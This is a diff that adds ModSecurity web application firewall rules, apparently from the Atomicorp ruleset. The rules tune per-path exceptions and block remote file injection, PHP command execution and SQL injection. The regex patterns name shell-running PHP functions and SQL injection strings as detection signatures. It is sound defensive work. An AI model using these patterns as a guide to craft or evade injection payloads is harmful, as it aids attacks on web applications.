+SecRule REQUEST_FILENAME "/manager/index\.php" "phase:2,id:91099,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156"
+SecAction "phase:2,id:91100,t:none,pass,nolog,skipAfter:END_RULES_91100"
+
+SecRule REQUEST_URI|ARGS|!ARGS:post "< ?\?" "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,chain,id:360128,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote PHP command exection',deny,log,auditlog,status:403,phase:2"
+SecRule REQUEST_URI|ARGS|!ARGS:/^layout/ "(?:(?:chr|fwrite|fopen|system|echr|passthru|serialize|include|php_uname|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg_\w+) ?(?:\(|@|\: ?'?)|system\( ?getenv ?\( ?http_php ?\) ?\))"
+
+SecRule ARGS|!ARGS:/prefix/|!ARGS:/text/|!ARGS:description|!ARGS:suitability|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/website/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:ta|!ARGS:post|!ARGS:/video/|!ARGS:/^tv/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340523,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/manager/index.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/text/|!ARGS:/prefix/|!ARGS:description|!ARGS:suitability|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/website/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:ta|!ARGS:post|!ARGS:/video/|!ARGS:/^tv/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340524,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/manager/index.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:post|!ARGS:filecontent|!ARGS:/gen_header/|!ARGS:/template/|!ARGS:newcontent|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/ "include ?\(" "capture,id:350855,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Include File Injection attempt in argument',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/.*\)"
+
+
+SecRule ARGS|!ARGS:post|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/description/|!ARGS:/text/|!ARGS:Db_submit|!ARGS:/table/|!ARGS:EXPORTTABLE|!ARGS:message|!ARGS:previous_field|ARGS_NAMES|REQUEST_FILENAME|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:X-PageView|!ARGS_NAMES:/varchar/|!ARGS_NAMES:cfg_xsp_password|!ARGS:/body/|!ARGS:runQuery|!ARGS:field_type[]|!ARGS:/^field_type/|!ARGS:/^fieldtype_/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/subject/ "@pmFromFile sql.txt" "capture,id:350160,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,multimatch,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"
+
+SecRule ARGS|XML:/*|!ARGS:post|!ARGS:data|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:text|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:message|!ARGS:content  "(?:(\w+)(?:user|and)(\w+)char\([0-9]+\)|\b(?:execute|convert)\(|; ?delete.*;(?:insert|declare|varchar)|and .* \( ?select |(?:drop|create)(\w+)table|(?:declare|convert) .* varchar\(|null ?, ?(?:null ?, ?(?:null|accesslevel|user_name)) ?,|concat\(|union select |union all select|\b\W*?cast\b\W*?\(.* as |xecresultset|' ?; ?declare\b\W*?|; ?set @|select (?:load_file|char\()|(?:insert|remark)test;)" "capture,id:350159,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:replaceComments,t:lowercase,t:compressWhiteSpace,rev:28,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)',logdata:'%{TX.0}',multiMatch,deny,log,auditlog,status:403,phase:2"
+
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:elements|!ARGS:post|!ARGS:keywords|!ARGS:/sql/|!ARGS:prefix|!ARGS:data|!ARGS:description|!ARGS:alternate1|!ARGS:comment|!ARGS:body|!ARGS:fulldescr|!ARGS:article_content|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/text/|!ARGS:txt|!ARGS:action|!ARGS:Db_submit|!ARGS:saved_data|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:message|!ARGS:steps|!ARGS:fck_body  "(?:(\w+)(?:user|and)(\w+)char\([0-9]+\)|(?:execute|convert)\(|; ?delete.*;(?:insert|declare|varchar)|and .* \(select |(?:drop|create)(\w+)table|(?:declare|convert) .* varchar\(|null ?, ?(?:null ?, ?(?:null|accesslevel|user_name)) ?,|concat\(|union select |union all select|\b\W*?cast\b\W*?\(.* as|xecresultset|' ?; ?declare\b\W*?|; ?set @|select (?:load_file|char\()|(?:insert|remark)test;)" "capture,id:350157,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:32,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"
+
+
+SecMarker END_RULES_91100
+
+SecRule REQUEST_FILENAME "/cgi-bin/class/class_add\.pl" "phase:2,id:91101,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91102,t:none,pass,nolog,skipAfter:END_RULES_91102"
+
+SecRule ARGS|!ARGS:description|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340525,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/class/class_add.pl)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:description|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340526,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/class/class_add.pl)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91102
+
+SecRule REQUEST_FILENAME "/insert_image" "phase:2,id:91103,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91104,t:none,pass,nolog,skipAfter:END_RULES_91104"
+
+SecRule ARGS|!ARGS:DirName "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340527,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/insert_image)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:DirName "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340528,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/insert_uimage)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91104
+
+SecRule REQUEST_FILENAME "/administration/news\.php" "phase:2,id:91105,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91106,t:none,pass,nolog,skipAfter:END_RULES_91106"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:body2|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340529,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS ( /administration/news.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:body2|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340530,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/administration/news.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91106
+
+SecRule REQUEST_FILENAME "/admin/editor\.php" "phase:2,id:91107,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91108,t:none,pass,nolog,skipAfter:END_RULES_91108"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:/^Dialog/|!ARGS:/textarea/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340531,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/editor.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:/^Dialog/|!ARGS:/textarea/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340532,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/editor.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91108
+
+SecRule REQUEST_FILENAME "/cgi-sys/formmail\.cgi" "phase:2,id:91109,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91110,t:none,pass,nolog,skipAfter:END_RULES_91110"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Recommendations|!ARGS:Comments|!ARGS:background|!ARGS:redirect|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340533,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Recommendations|!ARGS:Comments|!ARGS:background|!ARGS:redirect|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340544,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91110
+
+SecRule REQUEST_FILENAME "/frame\.aspx" "phase:2,id:91111,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91112,t:none,pass,nolog,skipAfter:END_RULES_91112"
+
+SecRule ARGS|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340545,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/frame.aspx)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340546,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/frame.aspx)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91112
+
+SecRule REQUEST_FILENAME "/spaw/gethref\.php" "phase:2,id:91113,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91114,t:none,pass,nolog,skipAfter:END_RULES_91114"
+
+SecRule ARGS|!ARGS:img "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340547,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/spaw/gethref.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:img "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340548,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/spaw/gethref.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91114
+
+SecRule REQUEST_FILENAME "/cgi-bin/mt/mt\.fcgi" "phase:2,id:91115,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91116,t:none,pass,nolog,skipAfter:END_RULES_91116"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/text/|!ARGS:/description/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340549,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/mt/mt.fcgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/text/|!ARGS:/description/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340550,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/mt/mt.fcgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91116
+
+SecRule REQUEST_FILENAME "/modules/google_cse/google_cse\.js" "phase:2,id:91117,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/runmodule\.php" "phase:2,id:91118,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91119,t:none,pass,nolog,skipAfter:END_RULES_91119"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^item_number/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340551,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/runmodule.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^item_number/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340552,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/runmodule.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91119
+
+SecRule REQUEST_FILENAME "/admin/frame\.php" "phase:2,id:91120,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91121,t:none,pass,nolog,skipAfter:END_RULES_91121"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pagina "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340553,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/frame.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^item_number/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340554,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/frame.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91121
+
+SecRule REQUEST_FILENAME "/videos/install" "phase:2,id:91122,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91123,t:none,pass,nolog,skipAfter:END_RULES_91123"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:sitefolder "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340555,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/videos/install)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:sitefolder "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340556,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/videos/install)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91123
+
+SecRule REQUEST_FILENAME "/support/staff/index\.php" "phase:2,id:91124,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91125,t:none,pass,nolog,skipAfter:END_RULES_91125"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/contents/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340557,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/support/staff/index.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/contents/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340558,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/support/staff/index.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91125
+
+SecRule REQUEST_FILENAME "/cgi-bin/procform\.pl" "phase:2,id:91126,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91127,t:none,pass,nolog,skipAfter:END_RULES_91127"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:banner|!ARGS:backlink|!ARGS:Requests/Comments "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340559,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/procform.pl)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:banner|!ARGS:backlink|!ARGS:Requests/Comments "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340560,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/procform.pl)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91127
+
+SecRule REQUEST_FILENAME "/editcontent\.php" "phase:2,id:91128,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340161"
+SecAction "phase:2,id:91129,t:none,pass,nolog,skipAfter:END_RULES_91129"
+
